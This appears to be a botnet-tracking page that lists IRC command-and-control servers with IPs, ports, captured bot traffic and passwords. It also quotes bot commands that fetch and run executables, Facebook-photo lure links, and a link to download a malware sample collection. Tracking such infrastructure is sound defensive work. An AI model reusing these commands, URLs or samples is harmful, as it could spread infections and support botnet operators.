Remote Host Port Number 204.0.5.51 80 216.178.38.224 80 216.178.39.11 80 69.171.224.11 80 91.215.157.75 1866 PASS xxx NICK NEW-[USA|00|P|19936] USER XP-3545 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|19936] -ix JOIN #!high! test PONG 22 MOTD Now talking in #!high! Topic On: [ #!high! ] [ .m.s|.m.e your picture is very adorable 🙂 http://twe.ly/lPfb?=facebook.com-photos-01-08-2011-jpg ] infos about hosting: http://whois.domaintools.com/91.215.157.75
irc.thetechbuzz.net(botnet hosted in United States Walnut Psychz Networks)
Remote Host Port Number 74.117.58.153 6667 NICK ED41246 USER ED41246 ED41246 ED41246 ED41246 JOIN #Applet PONG :irc.botnet.com infos about hosting: http://whois.domaintools.com/74.117.58.153
haso.dukatlgg.com(botnet hosted in United States Staminus Communications)
Remote Host Port Number 70.38.98.236 80 72.20.30.13 33333 ircd here 72.20.30.13 5900 ircd here 72.20.30.13 8888 ircd here Away!maLatya@priv7Hax.net NICK :aLiSs Invisible Users: 5382 Operators: 51 IRC Operators online Channels: 822 channels formed Local users: Current local users: 465 Max: 1173 Global users: Current global users: 5392 Max: 10957 JOIN #NoVi-06# PRIVMSG #NoVi-06# :Executed processRead more...
212.252.34.199(botnet hosted in Turkey Netinternet-net)
212.252.34.199:4441 212.252.34.199:6667 188.132.196.171 PORT: 4441 ciaxx channels #x #xp #ozel1 ciaxx #ozel2 ciaxx #ozel3 ciaxx infos about hosting: http://whois.domaintools.com/212.252.34.199
24 mb malware samples
Another collection of malwares around 24 mb most of them are rats irc bots Download: http://www.p1nk.me/83KlJH
hub3.toikgame.com(botnet hosted in China Beijing Chinanet Jiangxi Province Network)
hub3.toikgame.com 59.63.157.62 hub3.fifa2012tgame.com hub3.mymess.net 60.190.223.125 Outgoing connection to remote server: hub3.toikgame.com TCP port 1110 Outgoing connection to remote server: hub3.mymess.net TCP port 1110 Outgoing connection to remote server: hub3.toikgame.com TCP port 1110 Outgoing connection to remote server: hub3.mymess.net TCP port 1110 Outgoing connection to remote server: hub3.toikgame.com TCP port 1110 Resolved : [hub3.toikgame.com] To [123.183.217.32]Read more...
216.240.131.95(botnet hosted in United States Los Angeles Atmlink Inc)
Remote Host Port Number 174.37.200.82 80 204.0.5.35 80 216.178.38.224 80 63.135.80.46 80 66.220.149.25 80 216.240.131.95 1234 PASS xxx MODE NEW-[USA|00|P|57896] -ix JOIN #!nn! test PONG 22 MOTD NICK NEW-[USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/216.240.131.95
pulpin.upda.in(botnet hosted in United States Dallas Colo4dallas Lp)
DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.10.2 pulpin.upda.in 174.136.0.29 pulpin.sch.in schn.no-ip.info 174.129.88.121 Outgoing connection to remote server: pulpin.upda.in TCP port 666 Outgoing connection to remote server: schn.no-ip.info TCP port 666 Outgoing connection to remote server: pulpin.upda.in TCP port 666 Remote Host Port Number 173.192.205.192 80 70.38.98.237 80 70.38.98.238 80 174.136.0.29 666 PASS dandodando MODERead more...
163.20.108.31(botnet hosted in Taiwan Taipei Tanet Taipei Nccu Regional Network)
Remote Host Port Number 163.20.108.31 1863 208.75.230.43 80 * The data identified by the following URLs was then requested from the remote web server: o http://www.freewebtown.com/newlow/im.exe o http://www.freewebtown.com/newlow/photo.exe JOIN #newbin# abc PONG 422 PRIVMSG #newbin# :[Download]: Downloading File From: http://www.freewebtown.com/newlow/im.exe, To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe PRIVMSG #newbin# :[Download]: File Successfully Downloaded To: C:Documents and SettingsUserNameApplicationRead more...
59.61.93.126(botnet hosted in China Xiamen Chinanet Fujian Province Network)
Remote Host Port Number 59.61.93.126 81 NICK n[USA|XP]7424992 USER s “” “lol” :s JOIN #newbin# JOIN #bin# abc PONG 422 Now talking in #newbin# Topic On: [ #newbin# ] [ .dl http://www.freewebtown.com/newlow/im.exe ] Topic By: [ rm- ] (rm) !im http://tiny.cc/facebook-photo-18-02-2011 infos about hosting: http://whois.domaintools.com/59.61.93.126